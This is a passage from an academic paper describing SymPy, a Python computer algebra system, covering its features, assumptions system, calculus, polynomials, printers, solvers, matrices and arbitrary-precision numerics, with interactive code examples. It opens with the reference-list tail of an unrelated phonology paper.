http://www.mml.cam.ac.uk/dtal/courses/ugrad/paper_support/li8/riggle-feature-chart.pdf Bruce Tesar. 2004. Contrast analysis in phonological learning. Technical Report ROA-695, Rutgers Opti- mality Archive. Bruce Tesar. 2014. Output-Driven Phonology: Theory and Learning. Cambridge University Press. Reyyan Yeniterzi. 2011. Exploiting morphology in turkish named entity recognition system. In Proc. of the ACL Student Session, pages 105–110. Introduction Formal Framework Probability Model Discussion: Why probability? Mapping URs to SRs: The phonology S Generating URs: The lexicon model M Prior Over the Parameters Inference A Bayesian network Loopy belief propagation Discussion: The finite-state requirement Loopy BP implementation details Parameter Learning Features of the Phonology Model Experimental Design Evaluation methodology Datasets Comparison systems Results Related Work Conclusions and Future Work work_zeh74wbijvb65adjkkafyhybvu ---- Submitted 22 June 2016 Accepted 21 November 2016 Published 02 January 2017 Corresponding author Aaron Meurer, asmeurer@gmail.com Academic editor Nick Higham Additional Information and Declarations can be found on page 22 DOI 10.7717/peerj-cs.103 Copyright 2017 Meurer et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS SymPy: symbolic computing in Python Aaron Meurer1, Christopher P. Smith2, Mateusz Paprocki3, Ondřej Čertík4, Sergey B. Kirpichev5, Matthew Rocklin3, AMiT Kumar6, Sergiu Ivanov7, Jason K. Moore8, Sartaj Singh9, Thilina Rathnayake10, Sean Vig11, Brian E. Granger12, Richard P. Muller13, Francesco Bonazzi14, Harsh Gupta15, Shivam Vats15, Fredrik Johansson16, Fabian Pedregosa17, Matthew J. Curry18,19,20, Andy R. Terrel21,22, Štěpán Roučka23, Ashutosh Saboo24, Isuru Fernando10, Sumith Kulal25, Robert Cimrman26 and Anthony Scopatz1 1 Department of Mechanical Engineering, University of South Carolina, Columbia, SC, United States 2 Polar Semiconductor, Inc., Bloomington, MN, United States 3 Continuum Analytics, Inc., Austin, TX, United States 4 Los Alamos National Laboratory, Los Alamos, NM, United States 5 Faculty of Physics, Moscow State University, Moscow, Russia 6 Department of Applied Mathematics, Delhi Technological University, New Delhi, India 7 Université Paris Est Créteil, Créteil, France 8 Mechanical and Aerospace Engineering, University of California, Davis, CA, United States 9 Mathematical Sciences, Indian Institute of Technology (BHU), Varanasi, Uttar Pradesh, India 10 Department of Computer Science and Engineering, University of Moratuwa, Katubedda, Moratuwa, Sri Lanka 11 University of Illinois at Urbana-Champaign, Urbana, IL, United States 12 California Polytechnic State University, San Luis Obispo, CA, United States 13 Center for Computing Research, Sandia National Laboratories, Albuquerque, NM, United States 14 Department of Theory and Bio-Systems, Max Planck Institute of Colloids and Interfaces, Potsdam, Germany 15 Indian Institute of Technology Kharagpur, Kharagpur, West Bengal, India 16 INRIA Bordeaux-Sud-Ouest—LFANT project-team, Talence, France 17 INRIA—SIERRA project-team, Paris, France 18 Department of Physics and Astronomy, University of New Mexico, Albuquerque, NM, United States 19 Center for Quantum Information and Control, University of New Mexico, Albuquerque, NM, United States 20 Sandia National Laboratories, Albuquerque, NM, United States 21 Fashion Metric, Inc, Austin, TX, United States 22 NumFOCUS, Austin, TX, United States 23 Department of Surface and Plasma Science, Faculty of Mathematics and Physics, Charles University in Prague, Praha, Czech Republic 24 Department of Computer Science, Department of Mathematics, Birla Institute of Technology and Science, Goa, India 25 Indian Institute of Technology Bombay, Mumbai, Maharashtra, India 26 New Technologies—Research Centre, University of West Bohemia, Plzeň, Czech Republic ABSTRACT SymPy is an open source computer algebra system written in pure Python. It is built with a focus on extensibility and ease of use, through both interactive and programmatic applications. These characteristics have led SymPy to become a popular symbolic library for the scientific Python ecosystem. This paper presents the architecture of SymPy, a description of its features, and a discussion of select submodules. The supplementary material provide additional examples and further outline details of the architecture and features of SymPy. Subjects Scientific Computing and Simulation, Software Engineering Keywords Python, Computer algebra system, Symbolics How to cite this article Meurer et al. (2017), SymPy: symbolic computing in Python. PeerJ Comput. Sci. 3:e103; DOI 10.7717/peerj- cs.103 https://peerj.com mailto:asmeurer@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.103 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.103 http://dx.doi.org/10.7717/peerj-cs.103 1This paper assumes a moderate familiarity with the Python programming language. INTRODUCTION SymPy is a full featured computer algebra system (CAS) written in the Python (Lutz, 2013) programming language. It is free and open source software, licensed under the 3-clause BSD license (Rosen, 2005). The SymPy project was started by Ondřej Čertík in 2005, and it has since grown to over 500 contributors. Currently, SymPy is developed on GitHub using a bazaar community model (Raymond, 1999). The accessibility of the codebase and the open community model allow SymPy to rapidly respond to the needs of users and developers. Python is a dynamically typed programming language that has a focus on ease of use and readability.1 Due in part to this focus, it has become a popular language for scientific computing and data science, with a broad ecosystem of libraries (Oliphant, 2007). SymPy is itself used as a dependency by many libraries and tools to support research within a variety of domains, such as SageMath (The Sage Developers, 2016) (pure and applied mathematics), yt (Turk et al., 2011) (astronomy and astrophysics), PyDy (Gede et al., 2013) (multibody dynamics), and SfePy (Cimrman, 2014) (finite elements). Unlike many CAS’s, SymPy does not invent its own programming language. Python itself is used both for the internal implementation and end user interaction. By using the operator overloading functionality of Python, SymPy follows the embedded domain specific language paradigm proposed by Hudak (1998). The exclusive usage of a single programming language makes it easier for people already familiar with that language to use or develop SymPy. Simultaneously, it enables developers to focus on mathematics, rather than language design. SymPy version 1.0 officially supports Python 2.6, 2.7 and 3.2–3.5. SymPy is designed with a strong focus on usability as a library. Extensibility is important in its application program interface (API) design. Thus, SymPy makes no attempt to extend the Python language itself. The goal is for users of SymPy to be able to include SymPy alongside other Python libraries in their workflow, whether that be in an interactive environment or as a programmatic part in a larger system. Being a library, SymPy does not have a built-in graphical user interface (GUI). However, SymPy exposes a rich interactive display system, and supports registering display formatters with Jupyter (Kluyver et al., 2016) frontends, including the Notebook and Qt Console, which will render SymPy expressions using MathJax (Cervone, 2012) or . The remainder of this paper discusses key components of the SymPy library. Section ‘Overview of capabilities’ enumerates the features of SymPy and takes a closer look at some of the important ones. The Section ‘Numerics’ looks at the numerical features of SymPy and its dependency library, mpmath. Section ‘Physics Submodule’ looks at the domain specific physics submodules for performing symbolic and numerical calculations in classical mechanics and quantum mechanics. Section ‘Architecture’ discusses the architecture of SymPy. Section ‘Projects that Depend on SymPy’ looks at a selection of packages that depend on SymPy. Conclusions and future directions for SymPy are given in ‘Conclusion and Future Work’. All examples in this paper use SymPy version 1.0 and mpmath version 0.19. Additionally, the Supplemental Information 1 takes a deeper look at a few SymPy topics. Section S1 discusses the Gruntz algorithm, which SymPy uses to calculate symbolic limits. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 2/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 2import * has been used here to aid the readability of the paper, but is best to avoid such wildcard import statements in production code, as they make it unclear which names are present in the namespace. Furthermore, imported names could clash with already existing imports from another package. For example, SymPy, the standard Python math library, and NumPy all define the exp function, but only the SymPy one will work with SymPy symbolic expressions. 3The three greater-than signs denote the user input for the Python interactive session, with the result, if there is one, shown on the next line. Sections S2–S9 of the supplement discuss the series, logic, Diophantine equations, sets, statistics, category theory, tensor, and numerical simplification submodules of SymPy, respectively. Section S10 provides additional examples for topics discussed in the main paper. Section S11 discusses the SymPy Gamma project. Finally, Section S12 of the supplement contains a brief comparison of SymPy with Wolfram Mathematica. The following statement imports all SymPy functions into the global Python namespace.2 From here on, all examples in this paper assume that this statement has been executed3: >>> from sympy import * All the examples in this paper can be tested on SymPy Live, an online Python shell that uses the Google App Engine (Ciurana, 2009) to execute SymPy code. SymPy Live is also integrated into the SymPy documentation at http://docs.sympy.org. OVERVIEW OF CAPABILITIES This section gives a basic introduction of SymPy, and lists its features. A few features— assumptions, simplification, calculus, polynomials, printers, solvers, and matrices—are core components of SymPy and are discussed in depth. Many other features are discussed in depth in the Supplemental Information 1. Basic usage Symbolic variables, called symbols, must be defined and assigned to Python variables before they can be used. This is typically done through the symbols function, which may create multiple symbols in a single function call. For instance, >>> x, y, z = symbols('x y z') creates three symbols representing variables named x, y, and z. In this particular instance, these symbols are all assigned to Python variables of the same name. However, the user is free to assign them to different Python variables, while representing the same symbol, such as a, b, c = symbols('x y z'). In order to minimize potential confusion, though, all examples in this paper will assume that the symbols x , y , and z have been assigned to Python variables identical to their symbolic names. Expressions are created from symbols using Python’s mathematical syntax. For instance, the following Python code creates the expression (x2−2x+3)/y. Note that the expression remains unevaluated: it is represented symbolically. >>> (x**2 - 2*x + 3)/y (x**2 - 2*x + 3)/y List of features Although SymPy’s extensive feature set cannot be covered in depth in this paper, bedrock areas, that is, those areas that are used throughout the library, are discussed in their own subsections below. Additionally, Table 1 gives a compact listing of all major capabilities present in the SymPy codebase. This grants a sampling from the breadth of topics and application domains that SymPy services. Unless stated otherwise, all features noted in Table 1 are symbolic in nature. Numeric features are discussed in Section ‘Numerics.’ Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 3/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://live.sympy.org http://docs.sympy.org http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 Table 1 SymPy features and descriptions. Feature (submodules) Description Calculus (sympy.core, sympy.calculus, sympy.integrals, sympy.series) Algorithms for computing derivatives, integrals, and limits. Category Theory (sympy.categories) Representation of objects, morphisms, and diagrams. Tools for drawing diagrams with Xy-pic (Rose, 1999). Code Generation (sympy.printing, sympy.codegen) Generation of compilable and executable code in a variety of different programming languages from expressions directly. Target languages include C, Fortran, Julia, JavaScript, Mathematica, MATLAB and Octave, Python, and Theano. Combinatorics & Group Theory (sympy.combinatorics) Permutations, combinations, partitions, subsets, various permutation groups (such as polyhedral, Rubik, symmetric, and others), Gray codes (Nijenhuis & Wilf, 1978), and Prufer sequences (Biggs, Lloyd & Wilson, 1976). Concrete Math (sympy.concrete) Summation, products, tools for determining whether summation and product expressions are convergent, absolutely convergent, hypergeometric, and for determining other properties; computation of Gosper’s normal form (Petkovšek, Wilf & Zeilberger, 1997) for two univariate polynomials. Cryptography (sympy.crypto) Block and stream ciphers, including shift, Affine, substitution, Vigenère’s, Hill’s, bifid, RSA, Kid RSA, linear-feedback shift registers, and Elgamal encryption. Differential Geometry (sympy.diffgeom) Representations of manifolds, metrics, tensor products, and coordinate systems in Riemannian and pseudo-Riemannian geometries (Sussman & Wisdom, 2013). Geometry (sympy.geometry) Representations of 2D geometrical entities, such as lines and circles. Enables queries on these entities, such as asking the area of an ellipse, checking for collinearity of a set of points, or finding the intersection between objects. Lie Algebras (sympy.liealgebras) Representations of Lie algebras and root systems. Logic (sympy.logic) Boolean expressions, equivalence testing, satisfiability, and normal forms. Matrices (sympy.matrices) Tools for creating matrices of symbols and expressions. Both sparse and dense representations, as well as symbolic linear algebraic operations (e.g., inversion and factorization), are supported. Matrix Expressions (sympy.matrices.expressions) Matrices with symbolic dimensions (unspecified entries). Block matrices. Number Theory (sympy.ntheory) Prime number generation, primality testing, integer factorization, continued fractions, Egyptian fractions, modular arithmetic, quadratic residues, partitions, binomial and multinomial coefficients, prime number tools, hexidecimal digits of π, and integer factorization. Plotting (sympy.plotting) Hooks for visualizing expressions via matplotlib (Hunter, 2007) or as text drawings when lacking a graphical back- end. 2D function plotting, 3D function plotting, and 2D implicit function plotting are supported. (continued on next page) Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 4/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 Table 1 (continued) Feature (submodules) Description Polynomials (sympy.polys) Polynomial algebras over various coefficient domains. Functionality ranges from simple operations (e.g., polynomial division) to advanced computations (e.g., Gröbner bases (Adams & Loustaunau, 1994) and multivariate factorization over algebraic number domains). Printing (sympy.printing) Functions for printing SymPy expressions in the terminal with ASCII or Unicode characters and converting SymPy expressions to and MathML. Quantum Mechanics (sympy.physics.quantum) Quantum states, bra–ket notation, operators, basis sets, representations, tensor products, inner products, outer products, commutators, anticommutators, and specific quantum system implementations. Series (sympy.series) Series expansion, sequences, and limits of sequences. This includes Taylor, Laurent, and Puiseux series as well as special series, such as Fourier and formal power series. Sets (sympy.sets) Representations of empty, finite, and infinite sets (including special sets such as the natural, integer, and complex numbers). Operations on sets such as union, intersection, Cartesian product, and building sets from other sets are supported. Simplification (sympy.simplify) Functions for manipulating and simplifying expressions. Includes algorithms for simplifying hypergeometric functions, trigonometric expressions, rational functions, combinatorial functions, square root denesting, and common subexpression elimination. Solvers (sympy.solvers) Functions for symbolically solving equations, systems of equations, both linear and non-linear, inequalities, ordinary differential equations, partial differential equations, Diophantine equations, and recurrence relations. Special Functions (sympy.functions) Implementations of a number of well known special functions, including Dirac delta, Gamma, Beta, Gauss error functions, Fresnel integrals, Exponential integrals, Logarithmic integrals, Trigonometric integrals, Bessel, Hankel, Airy, B-spline, Riemann Zeta, Dirichlet eta, polylogarithm, Lerch transcendent, hypergeometric, elliptic integrals, Mathieu, Jacobi polynomials, Gegenbauer polynomial, Chebyshev polynomial, Legendre polynomial, Hermite polynomial, Laguerre polynomial, and spherical harmonic functions. Statistics (sympy.stats) Support for a random variable type as well as the ability to declare this variable from prebuilt distribution functions such as Normal, Exponential, Coin, Die, and other custom distributions (Rocklin & Terrel, 2012). Tensors (sympy.tensor) Symbolic manipulation of indexed objects. Vectors (sympy.vector) Basic operations on vectors and differential calculus with respect to 3D Cartesian coordinate systems. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 5/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 4In SymPy, √ z is defined on the usual principal branch with the branch cut along the negative real axis. 5SymPy assumes that two expressions A and B commute with each other multiplicatively, that is, A·B=B·A, unless they both have commutative=False. Many algorithms in SymPy require special consideration to work correctly with noncommutative products. 6For historical reasons, this algorithm is distinct from the sympy.logic submodule, which is discussed in Section S3. SymPy also has an experimental assumptions system which stores facts separate from objects, and uses sympy.logic and a SAT solver for deduction. We will not discuss this system here. Assumptions The assumptions system allows users to specify that symbols have certain common mathematical properties, such as being positive, imaginary, or integer. SymPy is careful to never perform simplifications on an expression unless the assumptions allow them. For instance, the simplification √ t2= t holds if t is nonnegative (t ≥0), but it does not hold for a general complex t.4 By default, SymPy performs all calculations assuming that symbols are complex valued. This assumption makes it easier to treat mathematical problems in full generality. >>> t = Symbol('t') >>> sqrt(t**2) sqrt(t**2) By assuming the most general case, that t is complex by default, SymPy avoids performing mathematically invalid operations. However, in many cases users will wish to simplify expressions containing terms like √ t2. Assumptions are set on Symbol objects when they are created. For instance Symbol('t', positive=True) will create a symbol named t that is assumed to be positive. >>> t = Symbol('t', positive=True) >>> sqrt(t**2) t Some of the common assumptions are negative, real, nonpositive, integer, prime and commutative.5 Assumptions on any SymPy object can be checked with the is_ assumption attributes, like t.is_positive . Assumptions are only needed to restrict a domain so that certain simplifications can be performed. They are not required to make the domain match the input of a function. For instance, one can create the object ∑m n=0 f (n) as Sum(f(n), (n, 0, m)) without setting integer=True when creating the Symbol object n. The assumptions system additionally has deductive capabilities. The assumptions use a three-valued logic using the Python built in objects True, False, and None. Note that False is returned if the SymPy object doesn’t or can’t have the assumption. For example, both I.is_real and I.is_prime return False for the imaginary unit I. None represents the ‘‘unknown’’ case. This could mean that given assumptions do not unambiguously specify the truth of an attribute. For instance, Symbol('x', real=True).is_positive will give None because a real symbol might be positive or negative. None could also mean that not enough is known or implemented to compute the given fact. For instance, (pi + E).is_irrational gives None—indeed, the rationality of π+e is an open problem in mathematics (Lang, 1966). Basic implications between the facts are used to deduce assumptions. Deductions are made using the Rete algorithm (Doorenbos, 1995).6 For instance, the assumptions system knows that being an integer implies being rational. >>> i = Symbol('i', integer=True) >>> i.is_rational True Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 6/27 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103 7The measure parameter of the simplify function lets the user specify the Python function used to determine how complex an expression is. The default measure function returns the total number of operations in the expression. Table 2 Some SymPy simplification functions. expand expand the expression factor factor a polynomial into irreducibles collect collect polynomial coefficients cancel rewrite a rational function as p/q with common factors canceled apart compute the partial fraction decomposition of a rational function trigsimp simplify trigonometric expressions (Fu, Zhong & Zeng, 2006) hyperexpand expand hypergeometric functions (Roach, 1996; Roach, 1997) Furthermore, expressions compute the assumptions on themselves based on the assump- tions of their arguments. For instance, if x and y are both created with positive=True, then (x + y).is_positive will be True (whereas (x - y).is_positive will be None). Simplification The generic way to simplify an expression is by calling the simplify function. It must be emphasized that simplification is not a rigorously defined mathematical operation (Moses, 1971). The simplify function applies several simplification routines along with heuristics to make the output expression ‘‘simple’’.7 It is often preferable to apply more directed simplification functions. These apply very specific rules to the input expression and are typically able to make guarantees about the output. For instance, the factor function, given a polynomial with rational coefficients in several variables, is guaranteed to produce a factorization into irreducible factors. Table 2 lists common simplification functions. Examples for these simplification functions can be found in Section S10. Calculus SymPy provides all the basic operations of calculus, such as calculating limits, derivatives, integrals, or summations. Limits are computed with the limit function, using the Gruntz algorithm (Gruntz, 1996) for computing symbolic limits and heuristics (a description of the Gruntz algorithm may be found in Section S1). For example, the following computes limx→∞ xsin( 1 x )=1. Note that SymPy denotes ∞ as oo (two lower case ‘‘o’’s). >>> limit(x*sin(1/x), x, oo) 1 As a more complex example, SymPy computes lim x→0 ( 2e 1−cos(x) sin(x) −1 ) sinh(x) atan2(x) =e. >>> limit((2*exp((1-cos(x))/sin(x))-1)**(sinh(x)/atan(x)**2), x, 0) E Derivatives are computed with the diff function, which recursively uses the various differentiation rules. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 7/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 >>> diff(sin(x)*exp(x), x) exp(x)*sin(x) + exp(x)*cos(x) Integrals are calculated with the integrate function. SymPy implements a combination of the Risch algorithm (Bronstein, 2005b), table lookups, a reimplementation of Manuel Bronstein’s ‘‘Poor Man’s Integrator’’ (Bronstein, 2005a), and an algorithm for computing integrals based on Meijer G-functions (Roach, 1996; Roach, 1997). These allow SymPy to compute a wide variety of indefinite and definite integrals. The Meijer G-function algorithm and the Risch algorithm are respectively demonstrated below by the computation of∫ ∞ 0 e−st log(t) dt =− log(s)+γ s and ∫ −2x2(log(x)+1)ex2+(ex2+1)2 x ( ex2+1 )2( log(x)+1 ) dx = log(log(x)+1)+ 1 ex2+1 . >>> s, t = symbols('s t', positive=True) >>> integrate(exp(-s*t)*log(t), (t, 0, oo)).simplify() -(log(s) + EulerGamma)/s >>> integrate((-2*x**2*(log(x) + 1)*exp(x**2) + ... (exp(x**2) + 1)**2)/(x*(exp(x**2) + 1)**2*(log(x) + 1)), x) log(log(x) + 1) + 1/(exp(x**2) + 1) Summations are computed with the summation function, which uses a combination of Gosper’s algorithm (Gosper, 1978), an algorithm that uses Meijer G-functions (Roach, 1996; Roach, 1997), and heuristics. Products are computed with product function via a suite of heuristics. >>> i, n = symbols('i n') >>> summation(2**i, (i, 0, n - 1)) 2**n - 1 >>> summation(i*factorial(i), (i, 1, n)) n*factorial(n) + factorial(n) - 1 Series expansions are computed with the series function. This example computes the power series of sin(x) around x =0 up to x6. >>> series(sin(x), x, 0, 6) x - x**3/6 + x**5/120 + O(x**6) Section S2 discusses series expansions methods in more depth. Integrals, derivatives, summations, products, and limits that cannot be computed return unevaluated objects. These can also be created directly if the user chooses. >>> integrate(x**x, x) Integral(x**x, x) >>> Sum(2**i, (i, 0, n - 1)) Sum(2**i, (i, 0, n - 1)) Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 8/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 8In a dense representation, the coefficients for all terms up to the degree of each variable are stored in memory. In a sparse representation, only the nonzero coefficients are stored. 9Many Python libraries distinguish the str form of an object, which is meant to be human-readable, and the repr form, which is mean to be valid Python that recreates the object. In SymPy, str(expr) == repr(expr). In other words, the string representation of an expression is designed to be compact, human-readable, and valid Python code that could be used to recreate the expression. As noted in Section ‘The core’, the srepr function prints the exact, verbose form of an expression. Polynomials SymPy implements a suite of algorithms for polynomial manipulation, which ranges from relatively simple algorithms for doing arithmetic of polynomials, to advanced methods for factoring multivariate polynomials into irreducibles, symbolically determining real and complex root isolation intervals, or computing Gröbner bases. Polynomial manipulation is useful in its own right. Within SymPy, though, it is mostly used indirectly as a tool in other areas of the library. In fact, many mathematical problems in symbolic computing are first expressed using entities from the symbolic core, preprocessed, and then transformed into a problem in the polynomial algebra, where generic and efficient algorithms are used to solve the problem. The solutions to the original problem are subsequently recovered from the results. This is a common scheme in symbolic integration or summation algorithms. SymPy implements dense and sparse polynomial representations.8 Both are used in the univariate and multivariate cases. The dense representation is the default for univariate polynomials. For multivariate polynomials, the choice of representation is based on the application. The most common case for the sparse representation is algorithms for computing Gröbner bases (Buchberger, F4, and F5) (Buchberger, 1965; Faugère, 1999; Faugère, 2002). This is because different monomial orderings can be expressed easily in this representation. However, algorithms for computing multivariate GCDs or factorizations, at least those currently implemented in SymPy (Paprocki, 2010), are better expressed when the representation is dense. The dense multivariate representation is specifically a recursively-dense representation, where polynomials in K[x0,x1,...,xn] are viewed as a polynomials in K[x0][x1]...[xn]. Note that despite this, the coefficient domain K , can be a multivariate polynomial domain as well. The dense recursive representation in Python gets inefficient as the number of variables increases. Some examples for the sympy.polys submodule can be found in Section S10. Printers SymPy has a rich collection of expression printers. By default, an interactive Python session will render the str form of an expression, which has been used in all the examples in this paper so far. The str form of an expression is valid Python and roughly matches what a user would type to enter the expression.9 >>> phi0 = Symbol('phi0') >>> str(Integral(sqrt(phi0), phi0)) 'Integral(sqrt(phi0), phi0)' A two-dimensional (2D) textual representation of the expression can be printed with monospace fonts via pprint. Unicode characters are used for rendering mathematical symbols such as integral signs, square roots, and parentheses. Greek letters and subscripts in symbol names that have Unicode code points associated are also rendered automatically. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 9/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-2 http://dx.doi.org/10.7717/peerj-cs.103 10See Section S4 for an in depth discussion on the Diophantine submodule. Alternately, the use_unicode=False flag can be set, which causes the expression to be printed using only ASCII characters. >>> pprint(Integral(sqrt(phi0 + 1), phi0), use_unicode=False) / | | __________ | \/ phi0 + 1 d(phi0) | / The function latex returns a representation of an expression. >>> print(latex(Integral(sqrt(phi0 + 1), phi0))) \int \sqrt{\phi_{0} + 1}\, d\phi_{0} Users are encouraged to run the init_printing function at the beginning of interactive sessions, which automatically enables the best pretty printing supported by their environment. In the Jupyter Notebook or Qt Console (Pérez & Granger, 2007), the printer is used to render expressions using MathJax or , if it is installed on the system. The 2D text representation is used otherwise. Other printers such as MathML are also available. SymPy uses an extensible printer subsystem, which allows extending any given printer, and also allows custom objects to define their printing behavior for any printer. The code generation functionality of SymPy relies on this subsystem to convert expressions into code in various target programming languages. Solvers SymPy has equation solvers that can handle ordinary differential equations, recurrence relationships, Diophantine equations,10 and algebraic equations. There is also rudimentary support for simple partial differential equations. There are two functions for solving algebraic equations in SymPy: solve and solveset. solveset has several design changes with respect to the older solve function. This distinction is present in order to resolve the usability issues with the previous solve function API while maintaining backward compatibility with earlier versions of SymPy. solveset only requires essential input information from the user. The function signatures of solve and solveset are solve(f, *symbols, **flags) solveset(f, symbol, domain=S.Complexes) The domain parameter can be any set from the sympy.sets module (see Section S5 for details on sympy.sets), but is typically either S.Complexes (the default) or S.Reals; the latter causes solveset to only return real solutions. An important difference between the two functions is that the output API of solve varies with input (sometimes returning a Python list and sometimes a Python dictionary) whereas solveset always returns a SymPy set object. Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 10/27 http://dx.doi.org/10.7717/peerj-cs.103/supp-1 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 11Similar to the polynomials submodule, dense here means that all entries are stored in memory, contrasted with a sparse representation where only nonzero entries are stored. Both functions implicitly assume that expressions are equal to 0. For instance, solveset(x - 1, x) solves x−1=0 for x. solveset is under active development as a planned replacement for solve. There are certain features which are implemented in solve that are not yet implemented in solveset, including multivariate systems, and some transcendental equations. Some examples for solveset and solve can be found in Section S10. Matrices Besides being an important feature in its own right, computations on matrices with symbolic entries are important for many algorithms within SymPy. The following code shows some basic usage of the Matrix class. >>> A = Matrix([[x, x + y], [y, x]]) >>> A Matrix([ [x, x + y], [y, x]]) SymPy matrices support common symbolic linear algebra manipulations, including matrix addition, multiplication, exponentiation, computing determinants, solving linear systems, singular values, and computing inverses using LU decomposition, LDL decomposition, Gauss-Jordan elimination, Cholesky decomposition, Moore–Penrose pseudoinverse, or adjugate matrices. All operations are performed symbolically. For instance, eigenvalues are computed by generating the characteristic polynomial using the Berkowitz algorithm and then finding its zeros using polynomial routines. >>> A.eigenvals() {x - sqrt(y*(x + y)): 1, x + sqrt(y*(x + y)): 1} Internally these matrices store the elements as Lists of Lists (LIL) (Jones et al., 2001), meaning the matrix is stored as a list of lists of entries (effectively, the input format used to create the matrix A above), making it a dense representation.11 For storing sparse matrices, the SparseMatrix class can be used. Sparse matrices store their elements in Dictionary of Keys (DOK) format, meaning that the entries are stored as a dict of (row, column) pairs mapping to the elements. SymPyalsosupports matrices withsymbolicdimensionvalues. MatrixSymbol represents a matrix with dimensions m×n, where m and n can be symbolic. Matrix addition and multiplication, scalar operations, matrix inverse, and transpose are stored symbolically as matrix expressions. Block matrices are also implemented in SymPy. BlockMatrix elements can be any matrix expression, including explicit matrices, matrix symbols, and other block matrices. All functionalities of matrix expressions are also present in BlockMatrix . When symbolic matrices are combined with the assumptions submodule for logical inference, they provide powerful reasoning over invertibility, semi-definiteness, Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 11/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 orthogonality, etc., which are valuable in the construction of numerical linear algebra systems (Rocklin, 2013). More examples for Matrix and BlockMatrix may be found in Section S10. NUMERICS While SymPy primarily focuses on symbolics, it is impossible to have a complete symbolic system without the ability to numerically evaluate expressions. Many operations directly use numerical evaluation, such as plotting a function, or solving an equation numerically. Beyond this, certain purely symbolic operations require numerical evaluation to effectively compute. For instance, determining the truth value of e+1>π is most conveniently done by numerically evaluating both sides of the inequality and checking which is larger. Floating-point numbers Floating-point numbers in SymPy are implemented by the Float class, which represents an arbitrary-precision binary floating-point number by storing its value and precision (in bits). This representation is distinct from the Python built-in float type, which is a wrapper around machine double types and uses a fixed precision (53-bit). Because Python float literals are limited in precision, strings should be used to input precise decimal values: >>> Float(1.1) 1.10000000000000 >>> Float(1.1, 30) # precision equivalent to 30 digits 1.10000000000000008881784197001 >>> Float("1.1", 30) 1.10000000000000000000000000000 The evalf method converts a constant symbolic expression to a Float with the specified precision, here 25 digits: >>> (pi + 1).evalf(25) 4.141592653589793238462643 Float numbers do not track their accuracy, and should be used with caution within symbolic expressions since familiar dangers of floating-point arithmetic apply (Goldberg, 1991). A notorious case is that of catastrophic cancellation: >>> cos(exp(-100)).evalf(25) - 1 0 Applying the evalf method to the whole expression solves this problem. Internally, evalf estimates the number of accurate bits of the floating-point approximation for each sub-expression, and adaptively increases the working precision until the estimated accuracy of the final result matches the sought number of decimal digits: >>> (cos(exp(-100)) - 1).evalf(25) -6.919482633683687653243407e-88 Meurer et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.103 12/27 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.103/supp-1 http://dx.doi.org/10.7717/peerj-cs.103 The evalf method works with complex numbers and supports more complicated expressions, such as special functions, infinite series, and integrals. The internal error tracking does not provide rigorous error bounds (in the sense of interval arithmetic) and cannot be used to accurately track uncertainty in measurement data; the sole purpose is to mitigate loss of accuracy that typically occurs when converting symbolic expressions to numerical values. The mpmath library The implementation of arbitrary-precision floating-point arithmetic is supplied by the mpmath library (Johansson & The mpmath Development Team, 2014). Originally, it was developed as a SymPy submodule but has subsequently been moved to a standalone pure-Python package. The basic datatypes in mpmath are mpf and mpc, which respectively act as multiprecision substitutes for Python’s float and complex. The floating-point precision is controlled by a global context: >>> import mpmath >>> mpmath.mp.dps = 30 # 30 digits of precision >>> mpmath.mpf("0.1") + mpmath.exp(-50) mpf('0.100000000000000000000192874984794') >>> print(_) # pretty-printed 0.100000000000000000000192874985 Like SymPy, mpmath is a pure Python library. A design decision of SymPy is to keep it and its required dependencies pure Python. This is a primary advantage of mpmath over other multiple precision libraries such as GNU MPFR (Fousse et al., 2007), which is faster. Like SymPy, mpmath is also BSD licensed (GNU MPFR is licensed under the GNU Lesser General Public License (Rosen, 2005)). Internally, mpmath represents a floating-point number (−1)sx ·2y by a tuple (s,x,y,b) where x and y are arbitrary-size Python integers and the redundant integer b stores the bit length of x for quick access. If GMPY (Horsen, 2015) is installed, mpmath automatically uses the gmpy.mpz type for x, and GMPY methods for rounding-related operations, improving performance. Most mpmath and SymPy 